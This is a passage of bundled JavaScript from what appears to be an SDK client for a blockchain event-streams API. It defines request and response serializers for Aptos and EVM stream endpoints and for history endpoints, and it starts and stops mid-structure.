    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$m,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$m,
    serializeRequest: $be177b42cca18859$var$serializeRequest$m,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$m
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$m(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$deserializeResponse$m(jsonResponse) {
    return $be177b42cca18859$export$752ed3dd409f1f27.create(jsonResponse);
}
function $be177b42cca18859$var$serializeRequest$m(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$deserializeRequest$m(jsonRequest) {
    return {
        id: jsonRequest.id
    };
}
var $be177b42cca18859$export$62ca96839ba2394c = {
    method: "PUT",
    name: "createStreamAptos",
    id: "aptosStreamsCreate",
    groupName: "aptosStreams",
    urlPathPattern: "/streams/aptos",
    bodyParamNames: [
        "webhookUrl",
        "tag",
        "functions",
        "events",
        "network",
        "includePayload",
        "includeEvents",
        "includeChanges",
        "description",
        "demo",
        "allAddresses"
    ],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$l,
    getRequestBody: $be177b42cca18859$var$getRequestBody$c,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$l,
    serializeRequest: $be177b42cca18859$var$serializeRequest$l,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$l
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$l() {
    return {};
}
function $be177b42cca18859$var$getRequestBody$c(request) {
    return {
        allAddresses: request.allAddresses,
        demo: request.demo,
        description: request.description,
        includeChanges: request.includeChanges,
        includeEvents: request.includeEvents,
        includePayload: request.includePayload,
        network: request.network.map(function(network) {
            return (0, $a7ef34a427d74c9c$export$5f4e060315c73a8).create(network);
        }),
        events: request.events,
        functions: request.functions,
        tag: request.tag,
        webhookUrl: request.webhookUrl
    };
}
function $be177b42cca18859$var$deserializeResponse$l(jsonResponse) {
    return $be177b42cca18859$export$752ed3dd409f1f27.create(jsonResponse);
}
function $be177b42cca18859$var$serializeRequest$l(request) {
    return {
        allAddresses: request.allAddresses,
        demo: request.demo,
        description: request.description,
        includeChanges: request.includeChanges,
        includeEvents: request.includeEvents,
        includePayload: request.includePayload,
        network: request.network.map(function(network) {
            return (0, $a7ef34a427d74c9c$export$5f4e060315c73a8).create(network).network;
        }),
        events: request.events,
        functions: request.functions,
        tag: request.tag,
        webhookUrl: request.webhookUrl
    };
}
function $be177b42cca18859$var$deserializeRequest$l(jsonRequest) {
    return {
        allAddresses: jsonRequest.allAddresses,
        demo: jsonRequest.demo,
        description: jsonRequest.description,
        includeChanges: jsonRequest.includeChanges,
        includeEvents: jsonRequest.includeEvents,
        includePayload: jsonRequest.includePayload,
        network: jsonRequest.network.map(function(network) {
            return (0, $a7ef34a427d74c9c$export$5f4e060315c73a8).create(network);
        }),
        events: jsonRequest.events,
        functions: jsonRequest.functions,
        tag: jsonRequest.tag,
        webhookUrl: jsonRequest.webhookUrl
    };
}
var $be177b42cca18859$export$fd577bad721745d0 = {
    method: "DELETE",
    name: "deleteAddressAptos",
    id: "aptosStreamsDeleteAddresses",
    groupName: "aptosStreams",
    urlPathParamNames: [
        "id"
    ],
    urlPathPattern: "/streams/aptos/{id}/address",
    bodyParamNames: [
        "address"
    ],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$k,
    getRequestBody: $be177b42cca18859$var$getRequestBody$b,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$k,
    serializeRequest: $be177b42cca18859$var$serializeRequest$k,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$k
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$k(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$getRequestBody$b(request) {
    return {
        address: Array.isArray(request.address) ? request.address.map(function(address) {
            return (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(address).address;
        }) : (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(request.address).address
    };
}
function $be177b42cca18859$var$deserializeResponse$k(jsonResponse) {
    return jsonResponse;
}
function $be177b42cca18859$var$serializeRequest$k(request) {
    return {
        id: request.id,
        address: Array.isArray(request.address) ? request.address.map(function(address) {
            return (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(address).address;
        }) : (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(request.address).address
    };
}
function $be177b42cca18859$var$deserializeRequest$k(jsonRequest) {
    return {
        id: jsonRequest.id,
        address: Array.isArray(jsonRequest.address) ? jsonRequest.address.map(function(address) {
            return (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(address);
        }) : (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(jsonRequest.address)
    };
}
var $be177b42cca18859$export$b85bfcb549e86561 = {
    method: "DELETE",
    name: "deleteStreamAptos",
    id: "aptosStreamsDelete",
    groupName: "aptosStreams",
    urlPathParamNames: [
        "id"
    ],
    urlPathPattern: "/streams/aptos/{id}",
    bodyParamNames: [],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$j,
    getRequestBody: $be177b42cca18859$var$getRequestBody$a,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$j,
    serializeRequest: $be177b42cca18859$var$serializeRequest$j,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$j
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$j(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$getRequestBody$a() {
    return {};
}
function $be177b42cca18859$var$deserializeResponse$j(jsonResponse) {
    return jsonResponse;
}
function $be177b42cca18859$var$serializeRequest$j(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$deserializeRequest$j(jsonRequest) {
    return {
        id: jsonRequest.id
    };
}
var $be177b42cca18859$export$1104b7fb41dbce54 = {
    method: "GET",
    name: "getAddressesAptos",
    id: "aptosStreamsGetAddresses",
    groupName: "aptosStreams",
    urlPathParamNames: [
        "id"
    ],
    urlSearchParamNames: [
        "cursor",
        "limit"
    ],
    urlPathPattern: "/streams/aptos/{id}/address",
    firstPageIndex: 0,
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$i,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$i,
    serializeRequest: $be177b42cca18859$var$serializeRequest$i,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$i
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$i(request) {
    return {
        id: request.id,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor
    };
}
function $be177b42cca18859$var$deserializeResponse$i(jsonResponse) {
    var _a;
    return {
        result: ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(address) {
            return (0, $a7ef34a427d74c9c$export$4bf08dd0aef06cf6).create(address.address);
        }),
        total: jsonResponse.total
    };
}
function $be177b42cca18859$var$serializeRequest$i(request) {
    return {
        id: request.id,
        limit: request.limit,
        cursor: request.cursor
    };
}
function $be177b42cca18859$var$deserializeRequest$i(jsonRequest) {
    return {
        id: jsonRequest.id,
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor
    };
}
var $be177b42cca18859$export$618f8c89ae5ef7a2 = {
    method: "POST",
    name: "updateStreamAptos",
    id: "aptosStreamsUpdate",
    groupName: "aptosStreams",
    urlPathParamNames: [
        "id"
    ],
    urlPathPattern: "/streams/aptos/{id}",
    bodyParamNames: [
        "allAddresses",
        "demo",
        "description",
        "includeChanges",
        "includeEvents",
        "includePayload",
        "network",
        "events",
        "functions",
        "tag",
        "webhookUrl"
    ],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$h,
    getRequestBody: $be177b42cca18859$var$getRequestBody$9,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$h,
    serializeRequest: $be177b42cca18859$var$serializeRequest$h,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$h
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$h(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$getRequestBody$9(request) {
    return {
        allAddresses: request.allAddresses,
        demo: request.demo,
        description: request.description,
        includeChanges: request.includeChanges,
        includeEvents: request.includeEvents,
        includePayload: request.includePayload,
        network: request.network.map(function(network) {
            return (0, $a7ef34a427d74c9c$export$5f4e060315c73a8).create(network);
        }),
        events: request.events,
        functions: request.functions,
        tag: request.tag,
        webhookUrl: request.webhookUrl
    };
}
function $be177b42cca18859$var$deserializeResponse$h(jsonResponse) {
    return $be177b42cca18859$export$752ed3dd409f1f27.create(jsonResponse);
}
function $be177b42cca18859$var$serializeRequest$h(request) {
    return {
        id: request.id,
        allAddresses: request.allAddresses,
        demo: request.demo,
        description: request.description,
        includeChanges: request.includeChanges,
        includeEvents: request.includeEvents,
        includePayload: request.includePayload,
        network: request.network.map(function(network) {
            return (0, $a7ef34a427d74c9c$export$5f4e060315c73a8).create(network).network;
        }),
        events: request.events,
        functions: request.functions,
        tag: request.tag,
        webhookUrl: request.webhookUrl
    };
}
function $be177b42cca18859$var$deserializeRequest$h(jsonRequest) {
    return {
        id: jsonRequest.id,
        allAddresses: jsonRequest.allAddresses,
        demo: jsonRequest.demo,
        description: jsonRequest.description,
        includeChanges: jsonRequest.includeChanges,
        includeEvents: jsonRequest.includeEvents,
        includePayload: jsonRequest.includePayload,
        network: jsonRequest.network.map(function(network) {
            return (0, $a7ef34a427d74c9c$export$5f4e060315c73a8).create(network);
        }),
        events: jsonRequest.events,
        functions: jsonRequest.functions,
        tag: jsonRequest.tag,
        webhookUrl: jsonRequest.webhookUrl
    };
}
var $be177b42cca18859$export$44dd858b7429efd9 = {
    method: "POST",
    name: "updateStreamStatusAptos",
    id: "aptosStreamsUpdateStatus",
    groupName: "aptosStreams",
    urlPathParamNames: [
        "id"
    ],
    urlPathPattern: "/streams/aptos/{id}/status",
    bodyParamNames: [
        "status"
    ],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$g,
    getRequestBody: $be177b42cca18859$var$getRequestBody$8,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$g,
    serializeRequest: $be177b42cca18859$var$serializeRequest$g,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$g
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$g(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$getRequestBody$8(request) {
    return {
        status: request.status
    };
}
function $be177b42cca18859$var$deserializeResponse$g(jsonResponse) {
    return jsonResponse;
}
function $be177b42cca18859$var$serializeRequest$g(request) {
    return {
        id: request.id,
        status: request.status
    };
}
function $be177b42cca18859$var$deserializeRequest$g(jsonRequest) {
    return {
        id: jsonRequest.id,
        status: jsonRequest.status
    };
}
var $be177b42cca18859$export$b94aefd70722a72c = {
    method: "POST",
    name: "addAddressEvm",
    id: "AddAddressToStream",
    groupName: "evmStreams",
    urlPathPattern: "/streams/evm/{id}/address",
    bodyParamNames: [
        "address"
    ],
    urlPathParamNames: [
        "id"
    ],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$f,
    getRequestBody: $be177b42cca18859$var$getRequestBody$7,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$f,
    serializeRequest: $be177b42cca18859$var$serializeRequest$f,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$f
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$f(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$getRequestBody$7(request) {
    return {
        address: Array.isArray(request.address) ? request.address.map(function(a) {
            return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(a).checksum;
        }) : (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(request.address).checksum
    };
}
function $be177b42cca18859$var$deserializeResponse$f(jsonResponse) {
    var data = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(jsonResponse);
    return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, data), {
        address: data.address ? typeof data.address === "string" ? (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.address) : data.address.map(function(address) {
            return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(address);
        }) : undefined
    });
}
function $be177b42cca18859$var$serializeRequest$f(request) {
    return {
        id: request.id,
        address: Array.isArray(request.address) ? request.address.map(function(a) {
            return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(a).checksum;
        }) : (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(request.address).checksum
    };
}
function $be177b42cca18859$var$deserializeRequest$f(jsonRequest) {
    return {
        id: jsonRequest.id,
        address: Array.isArray(jsonRequest.address) ? jsonRequest.address.map(function(a) {
            return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(a);
        }) : (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(jsonRequest.address)
    };
}
var $be177b42cca18859$export$1142d3d1cbdc0e17 = {
    method: "GET",
    name: "getStreamsEvm",
    id: "GetStreams",
    groupName: "evmStreams",
    urlSearchParamNames: [
        "cursor",
        "limit"
    ],
    urlPathPattern: "/streams/evm",
    firstPageIndex: 0,
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$e,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$e,
    serializeRequest: $be177b42cca18859$var$serializeRequest$e,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$e
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$e(request) {
    return {
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor
    };
}
function $be177b42cca18859$var$deserializeResponse$e(jsonResponse) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(stream) {
        return $be177b42cca18859$export$ede2c68543e6ca59.create(stream);
    });
}
function $be177b42cca18859$var$serializeRequest$e(request) {
    return {
        cursor: request.cursor,
        limit: request.limit
    };
}
function $be177b42cca18859$var$deserializeRequest$e(jsonRequest) {
    return {
        cursor: jsonRequest.cursor,
        limit: jsonRequest.limit
    };
}
var $be177b42cca18859$export$fbc4e64b14e2716e = {
    method: "GET",
    name: "getStreamEvm",
    id: "GetStream",
    groupName: "evmStreams",
    urlPathPattern: "/streams/evm/{id}",
    urlPathParamNames: [
        "id"
    ],
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$d,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$d,
    serializeRequest: $be177b42cca18859$var$serializeRequest$d,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$d
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$d(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$deserializeResponse$d(jsonResponse) {
    return $be177b42cca18859$export$ede2c68543e6ca59.create(jsonResponse);
}
function $be177b42cca18859$var$serializeRequest$d(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$deserializeRequest$d(jsonRequest) {
    return {
        id: jsonRequest.id
    };
}
var $be177b42cca18859$export$5f0e8a2a28322ce6 = {
    method: "PUT",
    name: "createStreamEvm",
    id: "CreateStream",
    groupName: "evmStreams",
    urlPathPattern: "/streams/evm",
    bodyParamNames: [
        "webhookUrl",
        "description",
        "tag",
        "topic0",
        "allAddresses",
        "includeNativeTxs",
        "includeContractLogs",
        "includeInternalTxs",
        "includeAllTxLogs",
        "getNativeBalances",
        "chains",
        "abi",
        "advancedOptions",
        "demo",
        "triggers"
    ],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$c,
    getRequestBody: $be177b42cca18859$var$getRequestBody$6,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$c,
    serializeRequest: $be177b42cca18859$var$serializeRequest$c,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$c
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$c() {
    return {};
}
function $be177b42cca18859$var$getRequestBody$6(request) {
    var _a;
    return {
        webhookUrl: request.webhookUrl,
        description: request.description,
        tag: request.tag,
        topic0: request.topic0,
        allAddresses: request.allAddresses,
        includeNativeTxs: request.includeNativeTxs,
        includeContractLogs: request.includeContractLogs,
        includeInternalTxs: request.includeInternalTxs,
        includeAllTxLogs: request.includeAllTxLogs,
        getNativeBalances: request.getNativeBalances,
        chainIds: request.chains.map(function(chain) {
            return (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(chain).apiHex;
        }),
        abi: request.abi,
        advancedOptions: request.advancedOptions,
        demo: request.demo,
        triggers: (_a = request.triggers) === null || _a === void 0 ? void 0 : _a.map(function(trigger) {
            return $be177b42cca18859$export$fc515d0f3a73528a.create(trigger).format();
        })
    };
}
function $be177b42cca18859$var$deserializeResponse$c(jsonResponse) {
    return $be177b42cca18859$export$ede2c68543e6ca59.create(jsonResponse);
}
function $be177b42cca18859$var$serializeRequest$c(request) {
    var _a;
    return {
        webhookUrl: request.webhookUrl,
        description: request.description,
        tag: request.tag,
        topic0: request.topic0,
        allAddresses: request.allAddresses,
        includeNativeTxs: request.includeNativeTxs,
        includeContractLogs: request.includeContractLogs,
        includeInternalTxs: request.includeInternalTxs,
        includeAllTxLogs: request.includeAllTxLogs,
        chainIds: request.chains.map(function(chain) {
            return (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(chain).apiHex;
        }),
        abi: request.abi,
        advancedOptions: request.advancedOptions,
        demo: request.demo,
        triggers: (_a = request.triggers) === null || _a === void 0 ? void 0 : _a.map(function(trigger) {
            return $be177b42cca18859$export$fc515d0f3a73528a.create(trigger).format();
        })
    };
}
function $be177b42cca18859$var$deserializeRequest$c(jsonRequest) {
    var _a;
    return {
        webhookUrl: jsonRequest.webhookUrl,
        description: jsonRequest.description,
        tag: jsonRequest.tag,
        topic0: jsonRequest.topic0,
        allAddresses: jsonRequest.allAddresses,
        includeNativeTxs: jsonRequest.includeNativeTxs,
        includeContractLogs: jsonRequest.includeContractLogs,
        includeInternalTxs: jsonRequest.includeInternalTxs,
        includeAllTxLogs: jsonRequest.includeAllTxLogs,
        chains: jsonRequest.chainIds.map(function(chainId) {
            return (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(chainId);
        }),
        abi: jsonRequest.abi,
        advancedOptions: jsonRequest.advancedOptions,
        demo: jsonRequest.demo,
        triggers: (_a = jsonRequest.triggers) === null || _a === void 0 ? void 0 : _a.map(function(trigger) {
            return $be177b42cca18859$export$fc515d0f3a73528a.create(trigger);
        })
    };
}
var $be177b42cca18859$export$594575f06eb25032 = {
    method: "DELETE",
    name: "deleteAddressEvm",
    id: "DeleteAddressFromStream",
    groupName: "evmStreams",
    urlPathParamNames: [
        "id"
    ],
    urlPathPattern: "/streams/evm/{id}/address",
    bodyParamNames: [
        "address"
    ],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$b,
    getRequestBody: $be177b42cca18859$var$getRequestBody$5,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$b,
    serializeRequest: $be177b42cca18859$var$serializeRequest$b,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$b
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$b(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$getRequestBody$5(request) {
    return {
        address: Array.isArray(request.address) ? request.address.map(function(address) {
            return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(address).lowercase;
        }) : (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(request.address).lowercase
    };
}
function $be177b42cca18859$var$deserializeResponse$b(jsonResponse) {
    var data = (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(jsonResponse);
    return {
        streamId: jsonResponse.streamId,
        address: data.address ? typeof data.address === "string" ? (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(data.address) : data.address.map(function(address) {
            return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(address);
        }) : undefined
    };
}
function $be177b42cca18859$var$serializeRequest$b(request) {
    return {
        id: request.id,
        address: Array.isArray(request.address) ? request.address.map(function(address) {
            return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(address).lowercase;
        }) : (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(request.address).lowercase
    };
}
function $be177b42cca18859$var$deserializeRequest$b(jsonRequest) {
    return {
        id: jsonRequest.id,
        address: Array.isArray(jsonRequest.address) ? jsonRequest.address.map(function(address) {
            return (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(address);
        }) : (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(jsonRequest.address)
    };
}
var $be177b42cca18859$export$9e20afe667e5a6 = {
    method: "DELETE",
    name: "deleteStreamEvm",
    id: "DeleteStream",
    groupName: "evmStreams",
    urlPathParamNames: [
        "id"
    ],
    urlPathPattern: "/streams/evm/{id}",
    bodyParamNames: [],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$a,
    getRequestBody: $be177b42cca18859$var$getRequestBody$4,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$a,
    serializeRequest: $be177b42cca18859$var$serializeRequest$a,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$a
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$a(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$getRequestBody$4() {
    return {};
}
function $be177b42cca18859$var$deserializeResponse$a(jsonResponse) {
    return $be177b42cca18859$export$ede2c68543e6ca59.create(jsonResponse);
}
function $be177b42cca18859$var$serializeRequest$a(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$deserializeRequest$a(jsonRequest) {
    return {
        id: jsonRequest.id
    };
}
var $be177b42cca18859$export$e8a0e605eeabfb6e = {
    method: "GET",
    name: "getAddressesEvm",
    id: "GetAddresses",
    groupName: "evmStreams",
    urlPathParamNames: [
        "id"
    ],
    urlSearchParamNames: [
        "cursor",
        "limit"
    ],
    urlPathPattern: "/streams/evm/{id}/address",
    firstPageIndex: 0,
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$9,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$9,
    serializeRequest: $be177b42cca18859$var$serializeRequest$9,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$9
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$9(request) {
    return {
        id: request.id,
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor
    };
}
function $be177b42cca18859$var$deserializeResponse$9(jsonResponse) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(stream) {
        return $be177b42cca18859$var$__assign($be177b42cca18859$var$__assign({}, stream), {
            address: stream.address ? (0, $3dfc2d9370ba0cd1$export$762b85ce1c60fa11).create(stream.address) : undefined
        });
    });
}
function $be177b42cca18859$var$serializeRequest$9(request) {
    return {
        id: request.id,
        limit: request.limit,
        cursor: request.cursor
    };
}
function $be177b42cca18859$var$deserializeRequest$9(jsonRequest) {
    return {
        id: jsonRequest.id,
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor
    };
}
var $be177b42cca18859$export$6bac4b1bf4cd751e = {
    method: "POST",
    name: "updateStreamEvm",
    id: "UpdateStream",
    groupName: "evmStreams",
    urlPathParamNames: [
        "id"
    ],
    urlPathPattern: "/streams/evm/{id}",
    bodyParamNames: [
        "webhookUrl",
        "description",
        "tag",
        "topic0",
        "allAddresses",
        "includeNativeTxs",
        "includeContractLogs",
        "includeInternalTxs",
        "includeAllTxLogs",
        "getNativeBalances",
        "chains",
        "abi",
        "advancedOptions",
        "demo",
        "triggers"
    ],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$8,
    getRequestBody: $be177b42cca18859$var$getRequestBody$3,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$8,
    serializeRequest: $be177b42cca18859$var$serializeRequest$8,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$8
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$8(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$getRequestBody$3(request) {
    var _a, _b;
    return {
        webhookUrl: request.webhookUrl,
        description: request.description,
        tag: request.tag,
        topic0: request.topic0,
        allAddresses: request.allAddresses,
        includeNativeTxs: request.includeNativeTxs,
        includeContractLogs: request.includeContractLogs,
        includeInternalTxs: request.includeInternalTxs,
        includeAllTxLogs: request.includeAllTxLogs,
        getNativeBalances: request.getNativeBalances,
        chainIds: (_a = request.chains) === null || _a === void 0 ? void 0 : _a.map(function(chain) {
            return (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(chain).apiHex;
        }),
        abi: request.abi,
        advancedOptions: request.advancedOptions,
        demo: request.demo,
        triggers: (_b = request.triggers) === null || _b === void 0 ? void 0 : _b.map(function(trigger) {
            return $be177b42cca18859$export$fc515d0f3a73528a.create(trigger);
        })
    };
}
function $be177b42cca18859$var$deserializeResponse$8(jsonResponse) {
    return $be177b42cca18859$export$ede2c68543e6ca59.create(jsonResponse);
}
function $be177b42cca18859$var$serializeRequest$8(request) {
    var _a, _b;
    return {
        id: request.id,
        webhookUrl: request.webhookUrl,
        description: request.description,
        tag: request.tag,
        topic0: request.topic0,
        allAddresses: request.allAddresses,
        includeNativeTxs: request.includeNativeTxs,
        includeContractLogs: request.includeContractLogs,
        includeInternalTxs: request.includeInternalTxs,
        includeAllTxLogs: request.includeAllTxLogs,
        chainIds: (_a = request.chains) === null || _a === void 0 ? void 0 : _a.map(function(chain) {
            return (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(chain).apiHex;
        }),
        abi: request.abi,
        advancedOptions: request.advancedOptions,
        demo: request.demo,
        triggers: (_b = request.triggers) === null || _b === void 0 ? void 0 : _b.map(function(trigger) {
            return $be177b42cca18859$export$fc515d0f3a73528a.create(trigger).format();
        })
    };
}
function $be177b42cca18859$var$deserializeRequest$8(jsonRequest) {
    var _a, _b;
    return {
        id: jsonRequest.id,
        webhookUrl: jsonRequest.webhookUrl,
        description: jsonRequest.description,
        tag: jsonRequest.tag,
        topic0: jsonRequest.topic0,
        allAddresses: jsonRequest.allAddresses,
        includeNativeTxs: jsonRequest.includeNativeTxs,
        includeContractLogs: jsonRequest.includeContractLogs,
        includeInternalTxs: jsonRequest.includeInternalTxs,
        includeAllTxLogs: jsonRequest.includeAllTxLogs,
        chains: (_a = jsonRequest.chainIds) === null || _a === void 0 ? void 0 : _a.map(function(chainId) {
            return (0, $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7).create(chainId);
        }),
        abi: jsonRequest.abi,
        advancedOptions: jsonRequest.advancedOptions,
        demo: jsonRequest.demo,
        triggers: (_b = jsonRequest.triggers) === null || _b === void 0 ? void 0 : _b.map(function(trigger) {
            return $be177b42cca18859$export$fc515d0f3a73528a.create(trigger);
        })
    };
}
var $be177b42cca18859$export$3d5c010f80489b1f = {
    method: "POST",
    name: "updateStreamStatusEvm",
    id: "UpdateStreamStatus",
    groupName: "evmStreams",
    urlPathParamNames: [
        "id"
    ],
    urlPathPattern: "/streams/evm/{id}/status",
    bodyParamNames: [
        "status"
    ],
    bodyType: "properties",
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$7,
    getRequestBody: $be177b42cca18859$var$getRequestBody$2,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$7,
    serializeRequest: $be177b42cca18859$var$serializeRequest$7,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$7
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$7(request) {
    return {
        id: request.id
    };
}
function $be177b42cca18859$var$getRequestBody$2(request) {
    return {
        status: request.status
    };
}
function $be177b42cca18859$var$deserializeResponse$7(jsonResponse) {
    return jsonResponse;
}
function $be177b42cca18859$var$serializeRequest$7(request) {
    return {
        id: request.id,
        status: request.status
    };
}
function $be177b42cca18859$var$deserializeRequest$7(jsonRequest) {
    return {
        id: jsonRequest.id,
        status: jsonRequest.status
    };
}
var $be177b42cca18859$export$7746ed4e5712d0e5 = {
    method: "GET",
    name: "getHistory",
    id: "GetHistory",
    groupName: "history",
    urlPathPattern: "/history",
    urlSearchParamNames: [
        "excludePayload",
        "limit",
        "cursor"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $be177b42cca18859$var$getRequestUrlParams$6,
    deserializeResponse: $be177b42cca18859$var$deserializeResponse$6,
    serializeRequest: $be177b42cca18859$var$serializeRequest$6,
    deserializeRequest: $be177b42cca18859$var$deserializeRequest$6
};
// Methods
function $be177b42cca18859$var$getRequestUrlParams$6(request) {
    return {
        excludePayload: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.excludePayload, String),
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor
    };
}
function $be177b42cca18859$var$deserializeResponse$6(jsonResponse) {
    var _a;
    return (_a = jsonResponse.result) !== null && _a !== void 0 ? _a : [];
}
function $be177b42cca18859$var$serializeRequest$6(request) {
    return request;
}
function $be177b42cca18859$var$deserializeRequest$6(jsonRequest) {
    return jsonRequest;
}
var $be177b42cca18859$export$e283da455dc8626b = {
    method: "POST",
    name: "replayHistory",
    id: "ReplayHistory",
    groupName: "history",
    urlPathPattern: "/history/replay/{streamId}/{id}",
    urlPathParamNames: [
        "streamId",
        "id"
    ],
    bodyParamNames: [],
    bodyType: "properties",
